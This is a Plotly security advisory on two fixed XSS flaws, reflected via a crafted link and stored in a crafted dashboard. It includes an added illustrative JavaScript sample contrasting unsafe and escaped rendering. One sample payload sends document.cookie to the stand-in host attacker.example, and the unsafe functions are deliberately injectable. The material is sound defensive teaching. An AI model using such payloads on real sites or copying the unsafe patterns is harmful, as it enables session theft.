Plotly Security Advisory - XSS in Plotly web interface
Summary of issues
Two separate Cross-Site Scripting (XSS) vulnerabilities have been fixed in the Plotly web interface.
First issue: by tricking an unsuspecting user into following a specially crafted link to Plotly Cloud, an attacker could perform any action using the victim's credentials on that site.
Second issue: by tricking an unsuspecting user into viewing a specially crafted dashboard on Plotly Cloud or a Plotly On-Premise server, an attacker could likewise perform any action using the victim's credentials on that site.
Thanks to Nassim Bouali and Mahmoud G. for reporting these issues.
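The two issues above are the two classic XSS classes: a reflected one, where the payload travels in the crafted link and is echoed back by the page, and a stored one, where the payload is saved in attacker-authored content (here a dashboard) and runs when a victim opens it. In both cases script executes in the victim's origin, which is why it can act with the victim's credentials. The following is an added, generic illustration of each class beside its fix; it is not Plotly's code and does not reflect how the Plotly web interface is built. The function names, field names, URL parameter and sample payloads are constructed assumptions.

```javascript
// Added, generic illustration of the two XSS classes named in the advisory:
// reflected (payload carried in a crafted link) and stored (payload saved in
// attacker-authored dashboard content). Not Plotly's code; every function,
// field name and sample payload below is a constructed assumption.

// Escape the five characters that matter for text placed between tags or
// inside double-/single-quoted attribute values. Ampersand must go first so
// the entities produced by the later replacements are not re-escaped.
function escapeHtml(value) {
  return String(value)
    .replace(/&/g, "&amp;")
    .replace(/</g, "&lt;")
    .replace(/>/g, "&gt;")
    .replace(/"/g, "&quot;")
    .replace(/'/g, "&#39;");
}

// --- Reflected XSS: a query-string parameter is echoed into the page ---

// Vulnerable: the decoded value of ?q= is interpolated into markup unchanged,
// so a link such as /search?q=<img src=x onerror=...> runs script in the
// victim's session as soon as they follow it.
function renderSearchHeaderUnsafe(queryString) {
  const q = new URLSearchParams(queryString).get("q") || "";
  return `<h1>Results for ${q}</h1>`;
}

// Fixed: the same value is HTML-escaped at the point of output, so the
// browser renders the payload as literal text.
function renderSearchHeaderSafe(queryString) {
  const q = new URLSearchParams(queryString).get("q") || "";
  return `<h1>Results for ${escapeHtml(q)}</h1>`;
}

// --- Stored XSS: attacker-authored content is rendered for another user ---

// Vulnerable: id, title and description come from a dashboard the attacker
// saved earlier; the victim only has to open it. Note the attribute context:
// a stray quote in `id` lets the attacker add an event-handler attribute even
// without a `<` character.
function renderDashboardUnsafe(dashboard) {
  return `<section class="dashboard" data-id="${dashboard.id}">` +
    `<h2>${dashboard.title}</h2><p>${dashboard.description}</p></section>`;
}

// Fixed: every untrusted field is escaped, the quoted attribute included.
function renderDashboardSafe(dashboard) {
  return `<section class="dashboard" data-id="${escapeHtml(dashboard.id)}">` +
    `<h2>${escapeHtml(dashboard.title)}</h2>` +
    `<p>${escapeHtml(dashboard.description)}</p></section>`;
}

// Constructed sample inputs (assumptions, not payloads from the advisory).
// A crafted link: the attacker only needs the victim to click it.
const craftedLink = '?q=<img src=x onerror="alert(document.cookie)">';

// A crafted dashboard as it might come back from storage after the attacker
// saved it; the victim only needs to view it.
const craftedDashboard = {
  id: '42" onmouseover="alert(1)',
  title: "Q3 revenue<script>new Image().src='https://attacker.example/c?'+document.cookie</script>",
  description: "Looks harmless",
};
```

The fix in both cases is the same: encode untrusted data for the exact context it is written into, at the point of output. The escaper above is correct only for HTML text nodes and quoted attribute values; data written into a URL, a JavaScript string, a CSS value or an unquoted attribute needs its own encoding, and a Content-Security-Policy that disallows inline script is worth adding as defence in depth, since it limits the damage when one output site is missed.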
Affected products and versions
- Plotly Cloud was vulnerable to both issues prior to 2016-11-04.
- Plotly On-Premise version 2.0.0 is vulnerable to the second issue.
- Both issues were fixed in Plotly Cloud on 2016-11-04.
- The second issue has been fixed in Plotly On-Premise version 2.0.1, which is available as a free upgrade to all current Plotly On-Premise customers. (The first issue has never affected Plotly On-Premise.)
General notes regarding security reporting
Please send all security reports concerning Plotly products to firstname.lastname@example.org.